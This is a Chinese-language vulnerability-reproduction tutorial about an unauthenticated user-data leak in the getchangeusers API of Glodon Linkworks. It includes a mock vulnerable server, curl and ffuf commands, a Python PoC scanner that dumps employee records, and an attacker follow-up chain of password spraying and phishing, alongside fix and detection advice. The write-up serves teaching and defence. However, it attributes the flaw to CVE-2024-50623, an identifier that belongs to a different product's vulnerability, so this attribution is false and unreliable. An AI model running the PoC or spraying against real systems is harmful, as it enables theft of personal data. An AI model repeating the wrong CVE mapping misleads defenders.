CVE-2024-50623漏洞复现：企业应用未授权访问与敏感信息泄露实战分析

1. 项目概述：一次典型的企业应用信息泄露漏洞复现

最近在梳理一些企业级应用的历史漏洞时，广联达Linkworks的一个信息泄露漏洞引起了我的注意。这个漏洞编号为CVE-2024-50623，核心问题出在一个名为getchangeusers的接口上。对于从事安全研究、渗透测试或者企业安全运维的朋友来说，这类漏洞的复现和分析过程非常有价值。它不像那些利用链复杂的远程代码执行漏洞那样“炫技”，但恰恰是这种看似简单的信息泄露，往往能成为撕开内网防线的第一道口子，为后续的横向移动和权限提升提供关键情报。

广联达Linkworks作为国内建筑、工程领域广泛使用的协同办公与项目管理平台，其用户群体庞大，涉及大量企业核心数据和业务流程。因此，针对其组件的安全研究具有很高的现实意义。本次复现的目标，就是通过模拟攻击者的视角，完整地走一遍漏洞发现、验证和利用的流程，理解其成因、影响以及修复方案。整个过程我们会使用一个可控的测试环境，确保所有操作都在合法授权的范围内进行。无论你是想学习漏洞复现的基本方法论，还是希望深入了解企业应用安全测试的细节，这篇记录都能提供一份清晰的“作战地图”。

2. 漏洞背景与核心原理剖析

2.1 广联达Linkworks与问题接口定位

广联达Linkworks是一个集成度很高的企业协同管理平台，它通常包含流程审批、文档管理、任务协同、即时通讯等多个模块。这类系统在设计时，为了满足前后端数据交互的需求，会暴露大量的API（应用程序编程接口）供前端页面调用。getchangeusers接口从名字上推测，其功能很可能是用于获取系统内用户变更信息的列表或详情。

在正常的业务逻辑中，此类接口应当受到严格的访问控制。例如，只有拥有特定权限（如系统管理员、人事管理员）的用户才能访问，并且在返回数据时，应对敏感信息（如手机号、邮箱、身份证号后几位等）进行脱敏处理。然而，CVE-2024-50623漏洞的根源就在于，getchangeusers接口的访问控制机制存在缺陷，或者其数据返回逻辑未做任何过滤，导致未经认证的攻击者或低权限用户能够直接访问该接口，并获取到完整的、未脱敏的用户敏感信息列表。

2.2 信息泄露漏洞的常见模式与危害

信息泄露漏洞（Information Disclosure）是Web应用中最常见的漏洞类型之一。它不一定能直接导致服务器被控制，但其危害性常常被低估。具体到本案例，其危害主要体现在以下几个方面：

1. 用户隐私侵犯：直接泄露员工的姓名、工号、部门、手机号、邮箱等个人信息，违反《个人信息保护法》等相关法律法规。
2. 社会工程学攻击素材：攻击者利用获取到的真实员工姓名、部门信息，可以构造出极具迷惑性的钓鱼邮件或短信，大幅提高攻击成功率。
3. 内网渗透的跳板：获取到的邮箱账号往往与内网域账号命名规则一致，为后续的密码爆破、横向移动提供了精准的目标列表。
4. 业务逻辑漏洞挖掘基础：了解系统用户结构和权限关系，有助于攻击者发现更复杂的业务逻辑漏洞，如越权操作。

这类漏洞的产生原因多种多样，除了本次案例的接口未授权访问，还包括：错误的服务器配置（如开启目录浏览）、备份文件泄露、调试信息未关闭、API响应中包含过多信息（如将完整的数据库错误信息返回给前端）等。

注意：在进行任何安全测试前，必须获得目标系统所有者的明确书面授权。未经授权对任何系统进行漏洞扫描、探测或利用测试，均属违法行为。本文所有操作均在自主搭建的、隔离的测试环境中完成。

3. 复现环境搭建与工具准备

3.1 测试环境构建

为了安全、可控地复现该漏洞，我们需要搭建一个模拟环境。理想情况下，可以寻找存在该漏洞的Linkworks历史版本安装包，在虚拟机中安装。但由于商业软件安装包不易获取，且安装过程复杂，我们更常用的方法是搭建一个漏洞模拟靶场。

我们可以使用如Vulhub、VulnApp等开源漏洞靶场项目，或者更简单地，自己编写一个简单的Web应用来模拟漏洞场景。这里为了聚焦漏洞原理和复现过程，我们采用后者。

环境准备清单：

• 操作系统：Ubuntu 22.04 LTS 或 Windows 10/11。本文以Ubuntu为例。
• Web服务器：Apache 或 Nginx。我们选用轻量且简单的Pythonhttp.server模块，方便快速演示。
• 编程语言：Python 3，用于编写模拟漏洞的后端接口。
• 测试工具：Burp Suite Community（必备）、浏览器（Chrome/Firefox）、cURL命令行工具。

3.2 模拟漏洞接口开发

我们在测试机上创建一个目录，并编写一个Python脚本来模拟存在漏洞的getchangeusers接口。

# 创建项目目录 mkdir linkworks_vuln_demo && cd linkworks_vuln_demo

创建一个名为vuln_app.py的文件：

#!/usr/bin/env python3 from http.server import HTTPServer, BaseHTTPRequestHandler import json # 模拟一个包含敏感信息的用户变更数据列表 MOCK_USER_DATA = [ {"id": 1001, "name": "张三", "department": "研发部", "phone": "13800138001", "email": "zhangsan@company.com", "changeType": "新增"}, {"id": 1002, "name": "李四", "department": "财务部", "phone": "13900139002", "email": "lisi@company.com", "changeType": "调岗"}, {"id": 1003, "name": "王五", "department": "行政部", "phone": "13700137003", "email": "wangwu@company.com", "changeType": "离职"}, # ... 可以添加更多模拟数据 ] class VulnHandler(BaseHTTPRequestHandler): def do_GET(self): # 模拟漏洞接口：/api/getchangeusers 未授权即可访问 if self.path == '/api/getchangeusers': self.send_response(200) self.send_header('Content-Type', 'application/json') self.end_headers() response = { "code": 0, "msg": "success", "data": MOCK_USER_DATA } self.wfile.write(json.dumps(response, ensure_ascii=False).encode('utf-8')) # 模拟一个需要认证的正常接口 elif self.path == '/api/secure/data': auth_header = self.headers.get('Authorization') if auth_header == 'Bearer valid_token': self.send_response(200) self.send_header('Content-Type', 'application/json') self.end_headers() self.wfile.write(b'{"code":0, "msg":"Secure data accessed."}') else: self.send_response(401) self.end_headers() self.wfile.write(b'Unauthorized') else: self.send_response(404) self.end_headers() self.wfile.write(b'Not Found') def log_message(self, format, *args): # 禁止日志输出，保持控制台整洁 pass if __name__ == '__main__': server_address = ('', 8000) # 监听所有地址的8000端口 httpd = HTTPServer(server_address, VulnHandler) print('[*] 模拟漏洞服务器启动在 http://0.0.0.0:8000') print('[*] 漏洞接口：GET /api/getchangeusers') try: httpd.serve_forever() except KeyboardInterrupt: print('\n[*] 服务器关闭。')

运行这个脚本：

python3 vuln_app.py

现在，我们就有了一个运行在http://你的测试机IP:8000上的模拟漏洞环境。它模拟了两个接口：

1. /api/getchangeusers：存在未授权访问漏洞，直接返回所有用户敏感信息。
2. /api/secure/data：一个需要正确Token才能访问的安全接口，用于对比。

4. 漏洞探测与验证实操流程

4.1 初步信息收集与接口发现

在实际测试中，我们通常不会事先知道getchangeusers这个接口路径。发现它的过程可能涉及多种信息收集手段：

1. 目录与文件枚举：使用工具如dirsearch,gobuster,ffuf对目标Web应用进行目录爆破，寻找可能的API路径、备份文件、配置文件等。

   # 示例：使用ffuf进行目录爆破 ffuf -w /path/to/wordlist.txt -u http://target.com/FUZZ -mc 200,301,302,403

2. JS文件分析：现代Web应用的前端JavaScript文件中常常硬编码或动态构造API请求的URL。使用浏览器开发者工具（F12）的“源代码”（Sources）或“网络”（Network）选项卡，仔细查看加载的JS文件，搜索api、get、list、user等关键词。
3. 流量代理与分析：这是最有效的方法之一。配置浏览器代理（如Burp Suite），然后以普通用户身份正常使用目标系统的各个功能。在Burp的Proxy历史记录中，观察所有HTTP请求，特别关注/api/、/service/、/ajax/等路径下的请求，寻找类似getUsers、getData、list等命名的接口。

4.2 使用Burp Suite进行漏洞验证

假设我们已经通过某种方式（例如在JS文件中发现）得知了/api/getchangeusers这个接口路径。接下来使用Burp Suite进行验证。

1. 启动Burp并配置代理：打开Burp Suite，在Proxy -> Options中确保代理监听已开启（默认127.0.0.1:8080）。将浏览器代理设置为相同地址。
2. 发送测试请求：在浏览器中直接访问http://测试机IP:8000/api/getchangeusers。Burp会拦截到这个请求。
3. 转发与观察：在Burp的Proxy -> Intercept标签页，点击“Forward”将请求发送出去。然后切换到“HTTP history”标签页，找到刚才的请求记录并查看响应（Response）。

关键验证点：

• 状态码：响应状态码是否为200（成功）？
• 响应内容：响应体（Response body）中是否包含了完整的、未脱敏的用户敏感信息（如手机号、邮箱）？
• 认证缺失：检查原始请求（Raw Request），是否缺少常见的认证头，如Authorization: Bearer ...、Cookie等？与需要认证的接口（如我们模拟的/api/secure/data）的请求进行对比。

在我们的模拟环境中，你会直接看到一个JSON格式的响应，包含了所有模拟用户的详细信息。这初步证实了接口存在未授权访问问题。

4. 进一步利用——使用Repeater模块：为了更灵活地测试，我们可以将请求发送到Burp的Repeater模块。
   • 在HTTP history中右键点击该请求，选择“Send to Repeater”。
   • 切换到Repeater标签页，你可以修改请求方法（如从GET改为POST）、路径、参数、头部，然后反复点击“Send”进行测试。
   • 测试越权：尝试在请求中添加或修改参数，例如?userId=1001，看是否能获取特定用户的信息，或者尝试访问其他可能类似的接口，如/api/getallusers。

4.3 使用cURL命令行验证

Burp Suite功能强大，但有时在服务器命令行环境下，cURL是更快捷的验证工具。

# 基础验证：直接请求漏洞接口 curl -v http://测试机IP:8000/api/getchangeusers # 格式化输出（如果返回JSON） curl -s http://测试机IP:8000/api/getchangeusers | python3 -m json.tool # 对比测试：访问需要认证的接口（应返回401） curl -v http://测试机IP:8000/api/secure/data

-v参数可以显示详细的请求和响应头，这对于分析认证机制非常有用。如果第一个命令成功返回数据而第二个命令返回401 Unauthorized，这就形成了鲜明对比，进一步确认了漏洞的存在。

4.4 漏洞利用脚本编写（PoC）

为了自动化验证过程或用于授权范围内的批量检测，我们可以编写一个简单的Python PoC（概念验证）脚本。

#!/usr/bin/env python3 import requests import sys import json def check_vuln(url): """ 检查目标URL是否存在广联达Linkworks getchangeusers信息泄露漏洞。 """ vuln_api = '/api/getchangeusers' target_url = url.rstrip('/') + vuln_api headers = { 'User-Agent': 'Mozilla/5.0 (Security Test)' } try: # 设置超时，避免长时间等待 resp = requests.get(target_url, headers=headers, timeout=10, verify=False) # verify=False 仅用于测试环境，忽略SSL证书验证 resp.encoding = 'utf-8' # 判断漏洞存在的条件：状态码为200，且响应内容中包含明显的用户信息字段 if resp.status_code == 200: # 尝试解析JSON try: data = resp.json() # 检查响应结构，通常漏洞接口返回的data字段是数组，且包含敏感字段 if isinstance(data, dict) and 'data' in data: user_list = data['data'] if isinstance(user_list, list) and len(user_list) > 0: first_user = user_list[0] # 检查是否包含敏感字段，如phone, email, idcard等 sensitive_keys = ['phone', 'email', 'idcard', 'mobile'] if any(key in first_user for key in sensitive_keys): print(f'[+] 目标 {url} 可能存在信息泄露漏洞 (CVE-2024-50623)！') print(f' 接口：{target_url}') print(f' 获取到 {len(user_list)} 条用户数据。') # 可选：打印前几条数据样本 print(' 数据样本：') for i, user in enumerate(user_list[:2]): # 只打印前2条 print(f' {user}') return True # 如果返回的不是标准JSON结构，但包含明显的关键词，也提示 elif 'phone' in resp.text or 'email' in resp.text or 'name' in resp.text: print(f'[!] 目标 {url} 返回了可能包含敏感信息的明文数据，请手动审查。') print(f' 接口：{target_url}') return True except json.JSONDecodeError: # 如果不是JSON，检查响应文本内容 if len(resp.text) > 100: # 响应内容较长 print(f'[!] 目标 {url} 返回了非JSON格式的长文本响应，请手动审查：{target_url}') return False else: print(f'[-] 目标 {url} 接口 {vuln_api} 返回状态码：{resp.status_code}') return False except requests.exceptions.ConnectionError: print(f'[-] 无法连接到目标：{url}') except requests.exceptions.Timeout: print(f'[-] 请求超时：{url}') except Exception as e: print(f'[-] 检查目标 {url} 时发生错误：{e}') return False if __name__ == '__main__': if len(sys.argv) != 2: print(f'用法：{sys.argv[0]} <目标URL>') print(f'示例：{sys.argv[0]} http://192.168.1.100:8080') sys.exit(1) target = sys.argv[1] check_vuln(target)

脚本使用说明：

# 运行PoC脚本 python3 linkworks_poc.py http://测试机IP:8000

这个脚本会自动化地发送请求、解析响应，并根据预定义的规则（状态码200、返回JSON格式、数据中包含敏感字段）来判断漏洞是否存在。它提高了批量测试的效率。

实操心得：在实际漏洞挖掘中，自动化PoC脚本的规则不能写得太死板。有些接口可能返回XML格式，有些可能状态码是302跳转但响应体里已经有数据了。最好的PoC脚本应该具备一定的自适应能力，或者至少提供“原始响应输出”模式，方便测试者手动判断。此外，务必在脚本中加入延迟和错误处理，避免对目标造成DDoS攻击或因为单个目标超时而阻塞整个扫描队列。

5. 漏洞深度分析与修复建议

5.1 漏洞根因与代码层面分析

根据漏洞描述和复现现象，我们可以深入分析其代码层面的可能原因。这通常发生在MVC（模型-视图-控制器）架构的Web应用中。

1. 控制器（Controller）层权限校验缺失：处理/api/getchangeusers请求的控制器方法，可能没有添加任何权限注解或拦截器检查。例如，在Spring框架中，可能遗漏了@PreAuthorize("hasRole('ADMIN')")这样的注解；在.NET中，可能没有使用[Authorize(Roles = "Admin")]特性。

   • 错误代码示例（Spring Boot风格）：

     @RestController @RequestMapping("/api") public class UserController { @GetMapping("/getchangeusers") // 缺失 @PreAuthorize 注解 public ResponseEntity<List<UserDTO>> getChangeUsers() { // 直接查询数据库并返回全部数据 List<User> users = userService.getAllUsersWithChanges(); return ResponseEntity.ok(convertToDTO(users)); // DTO可能也未做脱敏 } }

2. 服务（Service）层或数据访问层逻辑错误：即使控制器有权限校验，也可能在服务层或数据访问层的方法被其他无需校验的接口错误调用，或者查询语句本身没有进行权限过滤。

3. 数据传输对象（DTO）或序列化配置不当：即使用户实体类（Entity）中敏感字段使用了@JsonIgnore等注解，但在返回给前端的特定DTO中，可能又重新包含了这些字段，且未做脱敏处理。

4. 路由或拦截器配置错误：可能全局的安全拦截器配置存在遗漏，导致/api/getchangeusers这个特定的URL路径没有被安全规则覆盖。

5.2 修复方案与加固措施

针对上述根因，修复措施需要从多个层面入手：

1. 实施严格的访问控制（首要）：

   • 代码修复：在对应的控制器方法上，添加基于角色（RBAC）或权限的访问控制注解。确保只有授权用户（如系统管理员、审计人员）才能访问。

     @GetMapping("/getchangeusers") @PreAuthorize("hasAnyAuthority('USER_VIEW_ALL', 'AUDIT_READ')") // 明确所需权限 public ResponseEntity<List<UserSafeDTO>> getChangeUsers() { // ... 业务逻辑 }

   • 配置修复：检查Web安全配置（如Spring Security的SecurityFilterChain），确保所有API端点，特别是/api/**路径，默认都需要认证，并对不需要认证的公开接口（如登录接口）进行显式放行。

2. 应用最小数据暴露原则：

   • 创建专用的、安全的DTO（Data Transfer Object）用于API响应。在DTO中，严格排除所有不必要的敏感字段，如手机号、邮箱、身份证号、密码哈希等。
   • 对于必须返回的敏感信息，进行脱敏处理。例如，手机号显示为138****8001，邮箱显示为z***n@company.com。

     public class UserSafeDTO { private Long id; private String name; private String department; private String changeType; // 不包含 phone 和 email 字段 // 或者包含脱敏后的字段 private String phoneMasked; // 例如 “138****8001” private String emailMasked; // 例如 “z***n@company.com” }

3. 输入输出验证与过滤：

   • 即使通过了权限校验，也要对查询参数进行验证，防止SQL注入或通过参数进行的越权查询（例如，通过修改userId参数查询他人信息）。
   • 在全局响应处理器中，可以添加一层过滤，确保意外泄露的敏感字段在最终输出前被清除或替换。

4. 安全开发生命周期（SDL）集成：

   • 代码审计：将接口权限审计纳入常规代码审查流程。
   • 自动化扫描：在CI/CD流水线中集成静态应用安全测试（SAST）和动态应用安全测试（DAST）工具，自动检测未授权访问和敏感信息泄露问题。
   • 定期渗透测试：聘请专业安全团队或使用自动化工具对系统进行定期的渗透测试，主动发现此类漏洞。

5.3 企业级安全防护补充

对于使用广联达Linkworks或其他类似商业软件的企业，在等待官方补丁的同时，可以采取以下临时缓解措施：

1. 网络层访问控制：在防火墙或WAF（Web应用防火墙）上设置规则，限制访问/api/getchangeusers等敏感接口的源IP范围，例如只允许管理员的IP或公司内网IP访问。
2. WAF规则部署：在WAF上自定义规则，拦截对疑似敏感信息泄露接口的请求，并记录日志告警。
3. 日志监控与告警：加强应用日志和网络日志的监控，对短时间内大量访问敏感接口的异常行为进行告警。
4. 及时更新与补丁管理：密切关注广联达官方发布的安全公告和补丁，建立完善的补丁管理流程，在测试后第一时间安排更新。

6. 漏洞复现的延伸思考与防御视角

6.1 从攻击者视角看信息泄露的利用链

复现一个漏洞不是终点，理解攻击者如何利用它更为重要。假设攻击者通过此漏洞获取了500条员工信息，他接下来可能会：

1. 信息整理与关联：将获取到的姓名、邮箱、部门信息整理成表格。利用邮箱前缀（如zhangsan）推测公司的内部账号命名规则（可能是姓名全拼）。
2. 密码喷洒攻击：针对推测出的内网账号（如zhangsan），尝试使用一些通用弱密码（如Company@2024、Welcome123、季节+年份等）进行登录。由于是从外网获取的邮箱，攻击目标可能是公司的VPN、OA邮箱系统或其他对外服务。
3. 鱼叉式钓鱼邮件：利用真实的部门和人名，编写极具针对性的钓鱼邮件。例如，“李四，我是研发部的张三，这是你要的Q2项目财务报表，请查收。”附件或链接包含木马。
4. 社会工程学：直接拨打获取到的手机号，冒充IT支持人员，以“系统升级需要验证密码”为由套取凭证。

这个简单的信息泄露漏洞，就像丢了一把钥匙，虽然不知道具体开哪扇门，但攻击者可以拿着它去尝试所有看起来像锁孔的地方。

6.2 防御者如何构建检测与响应机制

作为防御方，我们不能只依赖软件厂商的补丁。需要建立主动的检测和响应能力：

1. 异常API访问检测：在SIEM（安全信息和事件管理）系统中，建立针对类似getchangeusers、getallusers、download等敏感API路径的访问监控。关注以下异常：
   • 高频访问：非管理员IP在短时间内大量请求敏感接口。
   • 非常规时间访问：在深夜或节假日发起的访问。
   • 无Referer或异常UA的访问：直接通过工具发起的API调用，通常没有正常的页面Referer，User-Agent也可能是工具标识。
2. 数据外泄监测：部署DLP（数据防泄漏）系统或使用网络流量分析工具，监测是否有大尺寸的JSON/XML数据包从内部服务器流向外部非信任IP。
3. 蜜罐与诱饵：可以在不重要的服务器上部署一些伪装成真实API的“蜜罐”接口，一旦被访问立即告警，这能有效发现内网或外网的扫描行为。

6.3 安全测试方法论总结

通过这次复现，我们可以提炼出一套针对“未授权访问/信息泄露”类漏洞的通用测试方法：

1. 资产发现：使用扫描器、爬虫、手工浏览等方式，尽可能全面地收集目标的所有接口、参数、功能点。
2. 权限测试矩阵：
   • 未认证（Anonymous）：直接访问所有收集到的接口。
   • 低权限用户：以一个普通用户的身份（如新注册账号）访问所有接口，特别是那些看起来像管理功能的接口。
   • 横向越权：使用用户A的Token，尝试访问本应属于用户B的数据（如修改userId=B的参数）。
   • 纵向越权：使用普通用户权限，尝试访问管理员接口。
3. 参数变异测试：对接口参数进行FUZZ测试，尝试通过修改ID、类型等参数访问到超出权限范围的数据。
4. 响应深度分析：不要只看状态码。仔细检查每个响应的头部（看是否有调试信息、服务器版本泄露）、响应体（看是否包含错误详情、堆栈跟踪、敏感数据）、响应时间（盲注可能导致的延时）。

踩坑记录：在一次实际测试中，我发现一个接口返回状态码403（禁止访问），但响应体里却完整地写着“对不起，管理员admin，您无权查看财务部的数据”。这实际上泄露了当前登录的用户名（admin）和受保护的资源名称（财务部），为后续的攻击提供了线索。所以，永远不要相信状态码，一定要仔细阅读完整的响应内容。

漏洞复现的价值，远不止于验证一个CVE编号。它是一次完整的攻防思维训练。从信息收集到漏洞验证，从原理分析到修复建议，再到如何利用和如何防御，这个闭环过程能极大地提升我们对安全的理解深度和实战能力。对于企业而言，定期对自身系统进行类似的“健康检查”，远比在出事后再进行补救要主动和有效得多。